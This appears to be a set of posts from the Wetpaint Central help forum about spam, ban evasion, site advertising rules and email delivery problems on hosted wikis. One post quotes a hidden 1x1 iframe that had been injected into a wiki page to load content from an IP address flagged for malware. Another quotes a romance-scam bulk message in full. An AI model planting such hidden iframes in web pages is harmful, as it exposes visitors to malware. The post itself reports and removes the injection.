I've banned them from my site but they may hit other wikis too.

  • I require an IP ban? Hello Wetpaint.
My website is currently being spammed by people advertising pornographic content and websites, and I am having trouble banning these people.
Every time I ban a user, he or she simply creates a new account.

Can a Wetpaint employee please ban the spammers IP address from accessing or joining my website?

    My website is http://ndsfriendcodes.info

    Thank you.

  • New member spam message: Almost once every two weeks a spammer (or smambot) becomes a new member (named “baby”, “love”, or “rose”); see banned users below:

    http://www.eoht.info/accountSearch/banned

then bulk emails everyone a variation of the following message:

“Hello, My name is loveth, i saw your profile today at(www.eoht.info) and became intrested in you,i will also like to know you more, and if you can send an email to my email address,i will give you my pictures here is my email address (lovethbaby01@yahoo.com) I believe we can move from here! Awaiting for your mail to my email address above Loveth.(Remeber the distance or age or colour does not matter but love matters alot in life). PLEASE DON'T FORGET TO EMAIL ME HERE ON (lovethbaby01@yahoo.com) FOR MORE EXPLAINATION.”

Then everyone active on the site sends me a complaint message saying that someone is spamming them, etc.. I’m sure I’m not the only site having this problem.

To eliminate this, I propose we implement a 24-hour delay buffer window before a new user can send messages, or something to this effect. Comments and suggestions welcome.

  • New place to share your site with others Hello Wetpainters,

Here at Wetpaint Central, we strive to provide you with a place where you can find useful help information, learn the best tips and tricks, and hear all the latest Wetpaint news.

Many users find that Wetpaint Central is a good venue to find potential new members for their sites. Unfortunately, the posting of threads asking others to "come check out my site" tends to make it more difficult for the moderators (and other users) to find and respond to posts about important questions, suggestions, bugs, or other concerns that need attention.

We have decided from this point forward, we will NO LONGER ALLOW USERS TO ADVERTISE THEIR SITE ON WETPAINT CENTRAL. Any postings advertising or encouraging others to come visit your site will be deleted. We will give warnings, but we reserve the right to ban any repeat offenders.

Fear not! We understand that having a place to share your site with others is important to you so a handful of brave Wetpaint users have volunteered to run a site for just such a reason. From here on out, please use http://wpads.wetpaint.com/ to share your site with other Wetpaint users.

Don't forget that there are many different ways you can promote your site. We have tons of great tips on this subject at http://www.wetpaintcentral.com/page/Promote+Your+Site . The more of these tips you use, the better your site will do.

Good luck and thanks for using Wetpaint!

  • Malware error A page on our wiki has been complaining about malware to users that visit the page. We found some injected HTML on the page, and once we removed it, the warning went away for our users.

"The website wiki.sharendipity.com contains elements from the site 61.155.8.157, which appears to host malware - software that can hurt.... ... Proceed anyway?"

The page had the following iframe injected :

    "lt;iframe src="http://61.155.8.157/iframe/wp-stats.php" frameborder="0" height="1" width="1"&gt"

You can find all of the page history here : http://wiki.sharendipity.com/page/Action+Definitions

If you'd like more let me know and I will forward the screen shot of the browser warning.

  • E-Mails needed and SPAM. Help First, I added a new message to the new users notifying them to look for wetpaint emails in their e-mail Spam folders as soon as they join.
Since I respond to each and every new member within 3-4 hours, it is expected they are aware of this issue.

In any case, AOL does place wetpaint e-mails into the Spam folder. I have tried myself from different accounts.

My wiki has already 50 members and at this point I don't know how many of them gets my messages (from day one), and it is useless to send them more messages to check if they are ok . They will end up in their spam folder again.

In fact, at least 5 people are ghosts and I have no other way to contact them since I don't have their e-mails. being the creator. I should be able to contact them from different e-mail accounts other than wetpaint.

I can't contact them, it renders this educational site useless, honestly.

I am aware of anti-spam issues and to protect members, but this is certainly not the case.
I really need to resolve this issue
